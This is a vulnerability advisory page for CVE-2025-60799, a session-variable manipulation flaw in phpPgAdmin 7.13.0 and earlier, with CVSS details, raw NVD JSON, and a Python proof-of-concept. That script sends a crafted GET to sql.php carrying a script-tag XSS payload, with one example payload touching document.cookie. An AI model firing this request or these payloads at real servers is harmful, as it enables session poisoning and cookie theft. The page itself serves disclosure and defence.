Security Vulnerability Report
CVE-2025-60799 CVSS 6.1 MEDIUM

CVE-2025-60799

Published: 2025-11-20 15:17:39
Last Modified: 2025-11-25 19:08:52

Description

phpPgAdmin 7.13.0 and earlier contains an incorrect access control vulnerability in sql.php at lines 68-76. The application allows unauthorized manipulation of session variables by accepting user-controlled parameters ('subject', 'server', 'database', 'queryid') without proper validation or access control checks. Attackers can exploit this to store arbitrary SQL queries in $_SESSION['sqlquery'] by manipulating these parameters, potentially leading to session poisoning, stored cross-site scripting, or unauthorized access to sensitive session data.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:phppgadmin_project:phppgadmin:*:*:*:*:*:*:*:* - VULNERABLE
phpPgAdmin <= 7.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
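import requests
import sys

# CVE-2025-60799 PoC - phpPgAdmin Session Variable Manipulation
# Target: phpPgAdmin <= 7.13.0 (sql.php lines 68-76)
#
# NOTE(review): what this script demonstrates is narrower than its original
# status messages claimed. It issues one GET request and inspects only the
# HTTP status code; it never reads session state back, so it cannot show that
# $_SESSION['sqlquery'] was written, and it does not show any effect on a
# session other than the one the server associates with this client.
#
# Defensive reading: the request it produces is a GET to sql.php carrying
# 'subject', 'server', 'database', 'queryid' and 'query' in the query string.
# That parameter combination arriving from a client with no authenticated
# session is the pattern to look for in web server access logs.


def exploit_cve_2025_60799(target_url, attacker_query="<script>alert('XSS')</script>"):
    """
    Send the CVE-2025-60799 test request to a phpPgAdmin instance.

    Builds ``<target_url>/sql.php`` and issues a single GET request with the
    parameters the advisory names ('subject', 'server', 'database',
    'queryid') plus a 'query' value taken from ``attacker_query``.

    Args:
        target_url: Base URL of the phpPgAdmin installation; a trailing
            slash is stripped before ``/sql.php`` is appended.
        attacker_query: String sent as the 'query' parameter.

    Returns:
        True if the server answered with HTTP 200, False for any other
        status or if ``requests`` raised a RequestException. True means
        only that the endpoint responded; it is not evidence that any
        session variable changed (a 200 may equally be a login or error
        page -- the body is never examined).
    """
    # Target endpoint
    endpoint = f"{target_url.rstrip('/')}/sql.php"

    # Parameters the advisory describes as accepted without proper
    # validation (sql.php lines 68-76). The concrete values below are the
    # PoC author's choices, not values taken from the advisory.
    params = {
        'subject': 'server',
        'server': '1',                  # Server ID
        'database': 'postgres',         # Database name
        'queryid': 'malicious_query',   # Arbitrary query identifier
        'query': attacker_query         # Value under test
    }

    print(f"[*] Targeting: {endpoint}")
    print(f"[*] Injecting payload: {attacker_query}")

    try:
        # PR:N / UI:R are quoted from the CVSS vector on the advisory page.
        # No cookie jar is used, so nothing from the response (including any
        # session cookie) is retained by this script.
        response = requests.get(endpoint, params=params, timeout=10)

        if response.status_code == 200:
            print("[+] Request sent successfully")
            # Fix: the original printed that the payload was stored and
            # would fire for the "next victim". Neither statement is checked
            # by this code, so report only what was actually observed.
            print("[*] HTTP 200 only shows the endpoint responded; "
                  "it does not confirm that $_SESSION['sqlquery'] changed")
            return True
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return False

    except requests.exceptions.RequestException as e:
        # Connection errors, timeouts and malformed URLs all land here.
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    # argv[1] is the base URL (required); argv[2] optionally overrides the
    # default 'query' value.
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url> [payload]")
        print(f"Example: python {sys.argv[0]} http://vulnerable-server/phppgadmin '<script>alert(document.cookie)</script>'")
        sys.exit(1)

    target = sys.argv[1]
    payload = sys.argv[2] if len(sys.argv) > 2 else "<script>alert('CVE-2025-60799')</script>"

    exploit_cve_2025_60799(target, payload)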

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60799", "sourceIdentifier": "[email protected]", "published": "2025-11-20T15:17:38.533", "lastModified": "2025-11-25T19:08:52.227", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "phpPgAdmin 7.13.0 and earlier contains an incorrect access control vulnerability in sql.php at lines 68-76. The application allows unauthorized manipulation of session variables by accepting user-controlled parameters ('subject', 'server', 'database', 'queryid') without proper validation or access control checks. Attackers can exploit this to store arbitrary SQL queries in $_SESSION['sqlquery'] by manipulating these parameters, potentially leading to session poisoning, stored cross-site scripting, or unauthorized access to sensitive session data."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phppgadmin_project:phppgadmin:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.13.0", "matchCriteriaId": "AC3CB38F-12CA-4FA6-98DB-FFCC98F26715"}]}]}], "references": [{"url": "https://github.com/phppgadmin/phppgadmin/blob/master/sql.php#L68-L76", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/pr0wl1ng/security-advisories/blob/main/CVE-2025-60799.md", "source": "[email protected]", "tags": 
["Third Party Advisory"]}]}}